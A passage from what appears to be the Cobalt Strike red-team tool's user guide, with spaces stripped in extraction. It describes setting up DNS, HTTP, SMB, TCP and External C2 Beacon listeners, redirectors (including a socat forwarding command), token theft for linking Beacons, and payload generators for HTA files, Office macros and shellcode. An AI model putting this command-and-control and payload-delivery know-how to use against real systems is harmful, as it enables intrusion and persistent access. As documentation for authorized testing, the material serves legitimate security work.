+Thedurationvalueisthenumberofminutes,hours,ordaystosetthenew
+sleeptime.
+CobaltStrikeUserGuide www.fortra.com page:47
+
+ListenerandInfrastructureManagement/DNSBeacon
+Thesleeptimewillnotbeupdatedifthecurrentsleeptimeisgreaterthanthe
+newlyspecifieddurationvalue.Thesleeptimewillbeaffectedbythecurrent
+jittervalue.Onanysuccessfulconnectionthefailedattemptscountwillbe
+resettozeroandthesleeptimewillberesettothepriorvalue.
+DNS Host (Stager) -ThisconfigurestheDNSBeacon’sTXTrecordstager.Thisstager
+isonlyusedwithCobaltStrikefeaturesthatrequireanexplicitstager.YourCobalt
+Striketeamserversystemmustbeauthoritativeforthisdomainaswell.
+Profile -AllowsabeacontobeconfiguredwithaselectedMalleableC2profilevariant.
+DNS Port (Bind)-ThisfieldspecifiestheportyourDNSBeaconpayloadserverwill
+bindto.Thisoptionisusefulifyouwanttosetupportbendingredirectorsuchas
+aredirectorthatacceptsconnectionsonport53butroutestheconnectionto
+yourteamserveronanotherport.
+DNS Resolver -AllowsaDNSBeacontoegressusingaspecificDNSresolver,rather
+thanusingthedefaultDNSresolverforthetargetserver.SpecifytheIPAddress
+ofthedesiredresolver.ThisDNSResolverisnotusedbythestageroftheDNS
+Beacon.
+Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
+thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
+guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
+Pressthe...buttontoopentheGuardrailsSettings:
+figure25-GuardrailSettings
+CobaltStrikeUserGuide www.fortra.com page:48
+
+ListenerandInfrastructureManagement/DNSBeacon
+IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
+segments.Forexample:
+l 123.123.123.123
+l 123.123.123.*
+l 123.123.*.*
+l 123.*.*.*
+User Name:Enteraspecificname,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive.
+Server Name:Enteraspecificcomputername,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+Domain:Enteraspecificdomain,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+Testing
+TotestyourDNSconfiguration,openaterminalandtypenslookup jibberish.beacon domain.
+IfyougetanArecordreplyof0.0.0.0—thenyourDNSiscorrectlysetup.Ifyoudonotgetareply,
+thenyourDNSconfigurationisnotcorrectandtheDNSBeaconwillnotcommunicatewithyou.
+Notes
+l MakesureyourDNSrecordsreferencetheprimaryaddressonyournetworkinterface.
+CobaltStrike’sDNSserverwillalwayssendresponsesfrom yournetworkinterface’s
+primaryaddress.DNSresolverstendtodropreplieswhentheyrequestinformationfrom
+oneserver,butreceiveareplyfrom another.
+CobaltStrikeUserGuide www.fortra.com page:49
+
+ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
+l IfyouarebehindaNATdevice,makesurethatyouuseyourpublicIPaddressfortheNS
+recordandsetyourfirewalltoforwardUDPtrafficonport53toyoursystem.Cobalt
+StrikeincludesaDNSservertocontrolBeacon.
+l TocustomizethenetworktrafficindicatorsforyourDNSbeacons,seeDNS Beacons on
+page 148intheMalleableC2help.
+HTTP Beacon and HTTPS Beacon
+TheHTTPandHTTPSbeaconsdownloadtaskswithanHTTPGETrequest.Thesebeacons
+senddatabackwithanHTTPPOSTrequest.Thisisthedefault.Youhaveincrediblecontrolover
+thebehaviorandindicatorsinthispayloadviaMalleableC2.
+HTTP(S)Listener Setup
+TocreateaHTTPorHTTPSBeaconlistenerselectCobalt Strike -> Listenersonthemain
+menuandpresstheAddbuttonatthebottomoftheListenerstabdisplay.
+TheNewListenerpaneldisplays.
+CobaltStrikeUserGuide www.fortra.com page:50
+
+ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
+figure26-HTTPBeaconOptions
+SelectBeacon HTTPorBeacon HTTPSasthePayloadtypeandgivethelisteneraName.
+Makesuretogivethenewlisteneramemorablenameasthisnameishowyouwillrefertothis
+listenerthroughCobaltStrike’scommandsandworkflows.
+Parameters
+CobaltStrikeUserGuide www.fortra.com page:51
+
+ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
+HTTP(S) Hosts-Press[+] toaddoneormorehostsfortheHTTPBeacontocallhome
+to.Press[-]toremoveoneormorehosts.Press[X]toclearthecurrenthosts.If
+youhavemultiplehosts,youcanstillpasteacomma-separatedlistofcallback
+hostsintothisdialog.
+Thelengthofthebeaconhostlistinbeaconpayloadislimitedto255characters.
+ThisincludesarandomlyassignedURIforeachhostanddelimitersbetween
+eachiteminthelist.Ifthelengthisexceeded,hostswillbedroppedfromtheend
+ofthelistuntilitfitsinthespace.Therewillbemessagesintheteamserverlog
+fordroppedhosts.
+Host Rotation Strategy-Thisvalueconfiguresthebeaconsbehaviorforchoosing
+whichhost(s)fromthelisttouseforegress.Selectoneofthefollowing:
+round-robin:Selecttoloopthroughthelistofhostnamesintheordertheyare
+provided.Eachhostisusedforoneconnection.
+random:Selecttorandomlyselectahostnamefromthelisteachtimea
+connectionisattempted.
+failover-xx:Selecttouseaworkinghostaslongaspossible.Useeachhostinthe
+listuntiltheyreachaconsecutivefailovercount(x)ordurationtimeperiod
+(m,h,d),thenusethenexthost.
+rotate-xx:Selecttouseeachhostforaperiodoftime.Useeachhostinthelistfor
+thespecifiedduration(m,h,d),thenusethenexthost.
+Max Retry Stategy-Thisconfiguresthebeaconsbehaviorforexitingafteranumberof
+consecutivefailedconnectionattemptstotheTeamServer.Thereareseveral
+defaultoptionstochoosefromoryoucancreateyourownlistwiththe
+LISTENER_MAX_RETRY_STRATEGIEShook.SeeLISTENER_MAX_RETRY_
+STRATEGIES on page 227.
+none:Selecttoensurebeaconwillnotexitbecauseoffailedconnectionattempts.
+exit-xxx:Thesesettingsusethesyntaxofexit-[max_attempts]-[increase_
+attempts]-[duration][m,h,d].Themax_attemptvalueisthenumberof
+consecutivefailedattemptsbeforebeaconwillexit.Theincrease_attemptsis
+thenumberofconsecutivefailedattemptsbeforeincreasingthesleeptime.
+Thedurationvalueisthenumberofminutes,hours,ordaystosetthenew
+sleeptime.
+CobaltStrikeUserGuide www.fortra.com page:52
+
+ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
+Thesleeptimewillnotbeupdatedifthecurrentsleeptimeisgreaterthanthe
+newlyspecifieddurationvalue.Thesleeptimewillbeaffectedbythecurrent
+jittervalue.Onanysuccessfulconnectionthefailedattemptscountwillbe
+resettozeroandthesleeptimewillberesettothepriorvalue.
+HTTP Host (Stager)-ThiscontrolsthehostoftheHTTPStagerfortheHTTPBeacon.
+Thisvalueisonlyusedifyoupairthispayloadwithanattackthatrequiresan
+explicitstager.
+Profile-ThisiswhereyouselectaMalleableC2profilevariant.Avariantisawayof
+specifyingmultipleprofilevariationsinonefile.Withvariants,eachHTTPor
+HTTPSlisteneryousetupcanhavedifferentnetworkindicators.
+HTTP Port (C2)-ThisfieldsetstheportyourHTTPBeaconwillphonehometo.
+HTTP Port (Bind)-ThisfieldspecifiestheportyourHTTPBeaconpayloadwebserver
+willbindto.Theseoptionsareusefulifyouwanttosetupportbendingredirectors
+(e.g.,aredirectorthatacceptsconnectionsonport80or443butroutesthe
+connectiontoyourteamserveronanotherport).
+HTTP Host Header-Thisvalue,ifspecified,ispropagatedtoyourHTTPstagersand
+throughyourHTTPcommunication.Thisoptionmakesiteasiertotake
+advantageofdomainfrontingwithCobaltStrike.
+HTTP Proxy-Pressthe… buttontospecifyanexplicitproxyconfigurationforthis
+payload.
+Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
+thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
+guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
+Pressthe...buttontoopentheGuardrailsSettings:
+CobaltStrikeUserGuide www.fortra.com page:53
+
+ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
+figure27-GuardrailSettings
+IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
+segments.Forexample:
+l 123.123.123.123
+l 123.123.123.*
+l 123.123.*.*
+l 123.*.*.*
+User Name:Enteraspecificname,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive.
+Server Name:Enteraspecificcomputername,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+Domain:Enteraspecificdomain,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+CobaltStrikeUserGuide www.fortra.com page:54
+
+ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
+Manual HTTP Proxy Configuration
+The(Manual) Proxy Settingsdialogoffersseveraloptionstocontroltheproxyconfiguration
+forBeacon’sHTTPandHTTPSrequests.ThedefaultbehaviorofBeaconistousetheInternet
+Explorerproxyconfigurationforthecurrentprocess/usercontext.
+figure28-ManualProxySettings
+TheTypefieldconfiguresthetypeofproxy.TheHostandPortfieldstellBeaconwherethe
+proxylives.TheUsernameandPasswordfieldsareoptional.Thesefieldsspecifythe
+credentialsBeaconusestoauthenticatetotheproxy.
+ChecktheIgnore proxy settings; use direct connectionboxtoforceBeacontoattemptits
+HTTPandHTTPSrequestswithoutgoingthroughaproxy.
+PressSet toupdatetheBeacondialogwiththedesiredproxysettings.PressReset tosetthe
+proxyconfigurationbacktothedefaultbehavior.
+NOTE:
+ThemanualproxyconfigurationaffectstheHTTPandHTTPSBeaconpayloadstagesonly.
+Itdoesnotpropagatetothepayloadstagers.
+Redirectors
+Aredirectorisasystemthatsitsbetweenyourtarget’snetworkandyourteamserver.Any
+connectionsthatcometotheredirectorareforwardedtoyourteamservertoprocess.A
+redirectorisawaytoprovidemultiplehostsforyourBeaconpayloadstocallhometo.A
+CobaltStrikeUserGuide www.fortra.com page:55
+
+ListenerandInfrastructureManagement/SMBBeacon
+redirectoralsoaidsoperationalsecurityasitmakesithardertotracethetruelocationofyour
+teamserver.
+CobaltStrike’slistenermanagementfeaturessupporttheuseofredirectors.Simplyspecify
+yourredirectorhostswhenyousetupanHTTPorHTTPSBeaconlistener.CobaltStrikedoes
+notvalidatethisinformation.Ifthehostyouprovideisnotaffiliatedwiththecurrenthost,Cobalt
+Strikeassumesit’saredirector.Onesimplewaytoturnaserverintoaredirectoristousesocat.
+Here’sthesocatsyntaxtoforwardallconnectionsonport80totheteamserverat
+192.168.12.100onport80:
+socat TCP4-LISTEN:80,fork TCP4:192.168.12.100:80
+SMB Beacon
+TheSMBBeaconusesnamedpipestocommunicatethroughaparentBeacon.Thispeer-to-
+peercommunicationworkswithBeaconsonthesamehost.Italsoworksacrossthenetwork.
+WindowsencapsulatesnamedpipecommunicationwithintheSMBprotocol.Hence,thename,
+SMBBeacon.
+SMB Listener Setup
+TocreateaSMBBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress
+theAddbuttonatthebottomoftheListenerstabdisplay.
+TheSMBBeaconiscompatiblewithmostactionsinCobaltStrikethatspawnapayload.The
+exceptiontothisaretheuser-drivenattacksthatrequireexplicitstagers.
+CobaltStrikepost-exploitationandlateralmovementactionsthatspawnapayloadwillattempt
+toassumecontrolof(link)totheSMBBeaconpayloadforyou.IfyouruntheSMBBeacon
+manually,youwillneedtolinktoitfromaparentBeacon.
+TheNewListenerpaneldisplays.
+CobaltStrikeUserGuide www.fortra.com page:56
+
+ListenerandInfrastructureManagement/SMBBeacon
+figure29-SMBBeacon
+SelectBeacon SMBasthePayloadtypeandgivethelisteneraName.Makesuretogivethe
+newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough
+CobaltStrike’scommandsandworkflows.
+Parameters
+Pipename (C2)-Setanexplicitpipenameoracceptthedefaultoption.
+Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
+thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
+guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
+Pressthe...buttontoopentheGuardrailsSettings:
+CobaltStrikeUserGuide www.fortra.com page:57
+
+ListenerandInfrastructureManagement/SMBBeacon
+figure30-GuardrailSettings
+IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
+segments.Forexample:
+l 123.123.123.123
+l 123.123.123.*
+l 123.123.*.*
+l 123.*.*.*
+User Name:Enteraspecificname,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive.
+Server Name:Enteraspecificcomputername,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+Domain:Enteraspecificdomain,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+CobaltStrikeUserGuide www.fortra.com page:58
+
+ListenerandInfrastructureManagement/TCPBeacon
+Linking and Unlinking
+FromtheBeaconconsole,uselink [host] [pipe] tolinkthecurrentBeacontoanSMBBeacon
+thatiswaitingforaconnection.WhenthecurrentBeaconchecksin,itslinkedpeerswillcheckin
+too.
+Toblendinwithnormaltraffic,linkedBeaconsuseWindowsnamedpipestocommunicate.
+ThistrafficisencapsulatedintheSMBprotocol.Thereareafewcaveatstothisapproach:
+1. HostswithanSMBBeaconmustacceptconnectionsonport445.
+2. YoumayonlylinkBeaconsmanagedbythesameCobaltStrikeinstance.
+Ifyougetanerror5(accessdenied)afteryoutrytolinktoaBeacon:stealadomainuser’stoken
+orusemake_token DOMAIN\user password topopulateyourcurrenttokenwithvalid
+credentialsforthetarget.TrytolinktotheBeaconagain.
+TodestroyaBeaconlinkuseunlink [ip address] [session PID] intheparentorchild.The
+[sessionPID]argumentistheprocessIDoftheBeacontounlink.Thisvalueishowyouspecifya
+specificBeacontode-linkwhentherearemultiplechildrenBeacons.
+Whenyoude-linkanSMBBeacon,itdoesnotexitandgoaway.Instead,itgoesintoastate
+whereitwaitsforaconnectionfromanotherBeacon.Youmayusethelinkcommandto
+resumecontroloftheSMBBeaconfromanotherBeaconinthefuture.
+TCP Beacon
+TheTCPBeaconusesaTCPsockettocommunicatethroughaparentBeacon.Thispeer-to-
+peercommunicationworkswithBeaconsonthesamehostandacrossthenetwork.
+TCP Listener Setup
+TocreateaTCPBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress
+theAddbuttonatthebottomoftheListenerstabdisplay.
+TheNewListenerpaneldisplays.
+CobaltStrikeUserGuide www.fortra.com page:59
+
+ListenerandInfrastructureManagement/TCPBeacon
+figure31-TCPBeacon
+SelectBeacon TCPasthePayloadtypeandgivethelisteneraName.Makesuretogivethe
+newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough
+CobaltStrike’scommandsandworkflows.
+TheTCPBeaconconfiguredinthiswayisabindpayload.Abindpayloadisonethatwaitsfora
+connectionfromitscontroller(inthiscase,anotherBeaconsession).
+Parameters
+Port (C2)-ThisoptioncontrolstheporttheTCPBeaconwillwaitforconnectionson.
+Bind to localhost only-ChecktohavetheTCPBeaconbindto127.0.0.1whenit
+listensforaconnection.ThisisagoodoptionifyouusetheTCPBeaconfor
+localhost-onlyactions.
+Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
+thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
+guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
+Pressthe...buttontoopentheGuardrailsSettings:
+CobaltStrikeUserGuide www.fortra.com page:60
+
+ListenerandInfrastructureManagement/TCPBeacon
+figure32-GuardrailSettings
+IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
+segments.Forexample:
+l 123.123.123.123
+l 123.123.123.*
+l 123.123.*.*
+l 123.*.*.*
+User Name:Enteraspecificname,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive.
+Server Name:Enteraspecificcomputername,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+Domain:Enteraspecificdomain,oravaluethat:
+l “startswith”supportedby“*”wildcardcharacterontherightside
+l “endswith”supportedby“*”wildcardcharacterontheleftside
+Theguardiscase-insensitive
+CobaltStrikeUserGuide www.fortra.com page:61
+
+ListenerandInfrastructureManagement/ExternalC2
+TheTCPBeaconiscompatiblewithmostactionsinCobaltStrikethatspawnapayload.The
+exceptiontothisare,similartotheSMBBeacon,theuser-drivenattacksthatrequireexplicit
+stagers.
+CobaltStrikepost-exploitationandlateralmovementactionsthatspawnapayloadwillattempt
+toassumecontrolof(connect)totheTCPBeaconpayloadforyou.IfyouruntheTCPBeacon
+manually,youwillneedtoconnecttoitfromaparentBeacon.
+Connecting and Unlinking
+FromtheBeaconconsole,useconnect [ip address] [port] toconnectthecurrentsessiontoa
+TCPBeaconthatiswaitingforaconnection.Whenthecurrentsessionchecksin,itslinked
+peerswillcheckintoo.
+TodestroyaBeaconlinkuseunlink [ip address] [session PID] intheparentorchildsession
+console.Later,youmayreconnecttotheTCPBeaconfromthesamehost(oradifferenthost).
+External C2
+ExternalC2isaspecificationtoallowthird-partyprogramstoactasacommunicationlayerfor
+CobaltStrike’sBeaconpayload.Thesethird-partyprogramsconnecttoCobaltStriketoread
+framesdestinedfor,andwriteframeswithoutputfrompayloadscontrolledinthisway.The
+ExternalC2serveriswhatthesethird-partyprogramsusetointerfacewithyourCobaltStrike
+teamserver.
+External C2 Listener Setup
+TocreateanExternalC2BeaconlistenerselectCobalt Strike -> Listenersonthemainmenu
+andpresstheAddbuttonatthebottomoftheListenerstabdisplay.
+TheNewListenerpaneldisplays.
+GotoCobalt Strike ->Listeners,pressAdd,andchooseExternalC2asyourpayload.
+CobaltStrikeUserGuide www.fortra.com page:62
+
+ListenerandInfrastructureManagement/ExternalC2
+figure33-ExternalC2
+SelectExternal C2asthePayloadtypeandgivethelisteneraName.Makesuretogivethenew
+listeneramemorablenameasthisnameishowyouwillrefertothislistenerthroughCobalt
+Strike’scommandsandworkflows.
+Parameters
+Port (Bind)-SpecifytheporttheExternalC2serverwaitsforconnectionson.
+Bind to localhost only-ChecktomaketheExternalC2serverlocalhost-only.
+NOTE:
+ExternalC2listenersarenotlikeotherCobaltStrikelisteners.Youcannottargetthesewith
+CobaltStrike’spost-exploitationactions.Thisoptionisjustaconvienencetostandupthe
+interfaceitself.
+Specification
+TheExternalC2interfaceisdescribedintheExternalC2specification.
+CobaltStrikeUserGuide www.fortra.com page:63
+
+ListenerandInfrastructureManagement/ForeignListeners
+l ExternalC2Specification
+l extc2example.c
+Ifyou'dliketoadapttheexample(AppendixB)inthespecificationintoathird-partyC2,youmay
+assumea3-clauseBSDlicenseforthecodecontainedwithinthespecification.
+Third-party Materials
+Here'salistofthird-partyprojectsandpoststhatreference,use,orbuildonExternalC2:
+l Custom CommandandControl(C3)byF-SecureLabs.Aframeworkforrapid
+prototypingofcustom C2channels.
+l external_c2_frameworkbyJonathanEchavarria.APythonFrameworkforbuilding
+ExternalC2clientsandservers.
+l ExternalC2LibrarybyRyanHanson.NETlibrarywithWebAPI,WebSockets,andadirect
+socket.Includesunittestsandcomments.
+l TaskingOffice365forCobaltStrikeC2byMWR Labs.DiscussionanddemoofOffice
+365C2forCobaltStrike.
+l SharedFileC2byOutflankBV.POCtouseafile/shareforcommandandcontrol.
+Foreign Listeners
+CobaltStrikesupportstheconceptofforeignlisteners.Thesearealiasesforx86 payload
+handlers hostedintheMetasploitFrameworkorotherinstancesofCobaltStrike.Topassa
+WindowsHTTPSMeterpretersessiontoafriendwithmsfconsole,setupaForeignHTTPS
+payloadandpointtheHostandPortvaluestotheirhandler.Youmayuseforeignlisteners
+anywhereyouwoulduseanx86CobaltStrikelistener.
+Foreign Listeners Setup
+TocreateaForeignBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuand
+presstheAddbuttonatthebottomoftheListenerstabdisplay.
+TheNewListenerpaneldisplays.
+CobaltStrikeUserGuide www.fortra.com page:64
+
+ListenerandInfrastructureManagement/InfrastructureConsolidation
+figure34-ForeignHTTP
+SelectForeign HTTPorForeign HTTPSasthePayloadtypeandgivethelisteneraName.
+Makesuretogivethenewlisteneramemorablenameasthisnameishowyouwillrefertothis
+listenerthroughCobaltStrike’scommandsandworkflows.
+Parameters
+HTTP(S) Host (Stager)-Thisfieldspecifiesthenameoftheserverwhereyourforeign
+listenerislocated.
+HTTP(S) Port (Stager)-Thisfieldspecifiestheportontheserverwhereyourforeign
+listenerislisteningforconnections.
+Infrastructure Consolidation
+CobaltStrike’smodelfordistributedoperationsistostandupaseparateteamserverforeach
+phaseofyourengagement.Forexample,itmakessensetoseparateyourpost-exploitationand
+persistenceinfrastructure.Ifapost-exploitationactionisdiscovered,youdon’twantthe
+remediationofthatinfrastructuretoclearoutthecallbacksthatwillletyoubackintothe
+network.
+CobaltStrikeUserGuide www.fortra.com page:65
+
+ListenerandInfrastructureManagement/InfrastructureConsolidation
+Someengagementphasesrequiremultipleredirectorandcommunicationchanneloptions.
+CobaltStrike4.0isfriendlytothis.
+figure35-InfrastructureConsolidationFeatures
+YoucanbindmultipleHTTP,HTTPS,andDNSlistenerstoasingleCobaltStriketeamserver.
+Thesepayloadsalsosupportportbendingintheirconfiguration.Thisallowsyoutousethe
+commonportforyourchannel(80,443,or53)inyourredirectorandC2setups,butbindthese
+listenerstodifferentportstoavoidportconflictsonyourteamserversystem.
+Togivevarietytoyournetworkindicators,CobaltStrike’sMalleableC2profilesmaycontain
+multiplevariants.Avariantisawayofaddingvariationsofthecurrentprofileintooneprofilefile.
+YoumayspecifyaProfilevariantwhenyoudefineeachHTTPorHTTPSBeaconlistener.
+Further,youcandefinemultipleTCPandSMBBeaconsononeteamserver,eachwithdifferent
+pipeandportconfigurations.AnyegressBeacon,fromthesameteamserver,cancontrolanyof
+theseTCPorSMBBeaconpayloadsoncethey’redeployedinthetargetenvironment.
+CobaltStrikeUserGuide www.fortra.com page:66
+
+InitialAccess/Client-sideSystemProfiler
+Initial Access
+CobaltStrikehasseveraloptionsthataidinestablishinganinitialfootholdonatarget.This
+rangesfromprofilingpotentialtargetstopayloadcreationtopayloaddelivery.
+Client-side System Profiler
+Thesystemprofilerisareconnaissancetoolforclient-sideattacks.Thistoolstartsalocalweb-
+serverandfingerprintsanyonewhovisitsit.Thesystemprofilerprovidesalistofapplications
+andpluginsitdiscoversthroughtheuser’sbrowser.Thesystemprofileralsoattemptsto
+discovertheinternalIPaddressofuserswhoarebehindaproxyserver.
+Tostartthesystemprofiler,gotoAttacks -> System Profiler.Tostarttheprofileryoumust
+specifyaURItobindtoandaporttostarttheCobaltStrikeweb-serverfrom.
+IfyouspecifyaRedirectURL,CobaltStrikewillredirectvisitorstothisURLoncetheirprofileis
+taken.ClickLaunch tostartthesystemprofiler.
+TheSystemProfilerusesanunsignedJavaApplettodecloakthetarget’sinternalIPaddress
+anddeterminewhichversionofJavathetargethas.WithJava’sclick-to-runsecurityfeature—
+thiscouldraisesuspicion.UnchecktheUse Java Applettogetinformationboxtoremovethe
+JavaAppletfromtheSystemProfiler.
+ChecktheEnable SSLboxtoservetheSystemProfileroverSSL.Thisboxisdisabledunless
+youspecifyavalidSSLcertificatewithMalleableC2.Chapter11discussesthis.
+Application Browser
+Toviewtheresultsfromthesystemprofiler,gotoView->Applications.Thisopensan
+ApplicationstabwithatableshowingallapplicationinformationcapturedbytheSystem
+Profiler.
+Analyst Tips
+TheApplicationBrowserhasalotofinformationusefultoplanatargetedattack.Here'showto
+getthemostoutofthisoutput:
+TheinternalIPaddressfieldisgatheredfromabenignunsignedJavaapplet.Ifthisfieldsays
+unknown,thismeanstheJavaappletprobablydidnotrun.IfyouseeanIPaddresshere,this
+meanstheunsignedJavaappletran.
+CobaltStrikeUserGuide www.fortra.com page:67
+
+InitialAccess/CobaltStrikeWebServices
+InternetExplorerwillreportthebaseversiontheuserinstalled.AsInternetExplorergets
+updates--thereportedversioninformationdoesnotchange.CobaltStrikeusestheJScript.dll
+versiontoestimateInternetExplorer'spatchlevel.Gotosupport.microsoft.comandsearchfor
+JScript.dll'sbuildnumber(thethirdnumberintheversionstring)tomapittoanInternet
+Explorerupdate.
+A*64nexttoanapplicationmeansit'sanx64application.
+Cobalt Strike Web Services
+ManyCobaltStrikefeaturesrunfromtheirownwebserver.Theseservicesincludethesystem
+profiler,HTTPBeacon,andCobaltStrike’swebdrive-byattacks.It’sOKtohostmultipleCobalt
+Strikefeaturesononewebserver.
+TomanageCobaltStrike’swebservices,gotoView ->Web Drive-by ->Manage.Here,youmay
+copyanyCobaltStrikeURLtotheclipboardorstopaCobaltStrikewebservice.
+UseView ->Web Log tomonitorvisitstoyourCobaltStrikewebservices.
+IfCobaltStrike’swebserverseesarequestfromtheLynx,Wget,orCurlbrowser;CobaltStrike
+willautomaticallyreturna404page.CobaltStrikedoesthisaslightprotectionagainstblue
+teamsnooping.ThecanbeconfiguredwiththeMalleableC2‘.http-config.block_useragents’
+option.
+User-driven Attack Packages
+Thebestattacksarenotexploits.Rather,thebestattackstakeadvantageofnormalfeaturesto
+getcodeexecution.CobaltStrikemakesiteasytosetupseveraluser-drivenattacks.These
+attackstakeadvantageoflistenersyou’vealreadysetup.NavigateinthemenutoPayloadsand
+chooseoneofthefollowingoptions.
+HTML Application
+AnHTMLApplicationisaWindowsprogramwrittenInHTMLandanInternetExplorer
+supportedscriptinglanguage.ThispackagegeneratesanHTMLApplicationthatrunsaCobalt
+Strikelistener.
+NavigatetoPayloads -> HTML Application.
+CobaltStrikeUserGuide www.fortra.com page:68
+
+InitialAccess/User-drivenAttackPackages
+figure36-HTML ApplicationAttack
+Parameters
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+Method-Usethedrop-downtoselectoneofthefollowingmethodstoruntheselected
+listener:
+Executable:Thismethodwritesanexecutabletodiskandrunit.
+PowerShell:ThismethodusesaPowerShellone-linertorunyourpayloadstager.
+VBA:ThismethodusesaMicrosoftOfficemacrotoinjectyourpayloadinto
+memory.TheVBAmethodrequiresMicrosoftOfficeonthetargetsystem.
+PressGeneratetocreatetheHTMLApplication.
+MS Office Macro
+TheMicrosoftOfficeMacrotoolgeneratesamacrotoembedintoaMicrosoftWordor
+MicrosoftExceldocument.
+NavigatetoPayloads -> MS Office Macro.
+CobaltStrikeUserGuide www.fortra.com page:69
+
+InitialAccess/User-drivenAttackPackages
+figure37-MSOfficeMacro
+ChoosealistenerandpressGeneratetocreatethestep-by-stepinstructionstoembedyour
+macrointoaMicrosoftWordorExceldocument.
+Thisattackworkswellwhenyoucanconvinceausertorunmacroswhentheyopenyour
+document.
+Payload Generator
+CobaltStrike'sPayloadGeneratoroutputssourcecodeandartifactstostageaCobaltStrike
+listenerontoahost.ThinkofthisastheCobaltStrikeversionofmsfvenom.
+NavigatetoPayloads -> Stager Payload Generator.
+CobaltStrikeUserGuide www.fortra.com page:70
+
+InitialAccess/User-drivenAttackPackages
+figure38-PayloadGenerator
+Parameters
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+Output-Usethedrop-downtoselectoneofthefollowingoutputtypes(mostoptions
+giveyoushellcodeformattedasabytearrayforthatlanguage):
+C:Shellcodeformattedasabytearray.
+C#:Shellcodeformattedasabytearray.
+COM Scriptlet:A.sctfiletorunalistener
+Java:Shellcodeformattedasabytearray.
+Perl:Shellcodeformattedasabytearray.
+PowerShell:PowerShellscripttorunshellcode
+PowerShell Command:PowerShellone-linertorunaBeaconstager.
+Python:Shellcodeformattedasabytearray.
+Raw:blobofpositionindependentshellcode.
+Ruby:Shellcodeformattedasabytearray.
+Veil:CustomshellcodesuitableforusewiththeVeilEvasionFramework.
+VBA:Shellcodeformattedasabytearray.
+x64-Checktheboxtogenerateanx64stagerfortheselectedlistener.
+PressGeneratetocreateaPayloadfortheselectedoutputtype.
+Payload Generator (stageless)
+CobaltStrike'sPayloadGeneratoroutputssourcecodeandartifacts,withoutastager,toa
+CobaltStrikelistenerontoahost.
+NavigatetoPayloads -> Stageless Payload Generator.
+CobaltStrikeUserGuide www.fortra.com page:71
+
+InitialAccess/User-drivenAttackPackages
+figure39-StagelessPayloadGenerator
+Parameters
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+Guardrails-Ifyourlistenerhasbeenconfiguredwithgauardrails,thevalueisdisplayed
+asthedefault.Usethe...buttontooverridethesettingsforthebeacon.
+CobaltStrikeUserGuide www.fortra.com page:72
+
+InitialAccess/User-drivenAttackPackages
+figure40-GuardrailSettings
+Output-Usethedrop-downtoselectoneofthefollowingoutputtypes(mostoptions
+giveyoushellcodeformattedasabytearrayforthatlanguage):
+C:Shellcodeformattedasabytearray.
+C#:Shellcodeformattedasabytearray.
+Java:Shellcodeformattedasabytearray.
+Perl:Shellcodeformattedasabytearray.
+Python:Shellcodeformattedasabytearray.
+Raw:blobofpositionindependentshellcode.
+Ruby:Shellcodeformattedasabytearray.
+VBA:Shellcodeformattedasabytearray.
+Exit Function-Thisfunctiondeterminesthemethod/behaviorthatBeaconuseswhen
+theexitcommandisexecuted.
+Process:Terminatesthewholeprocess.
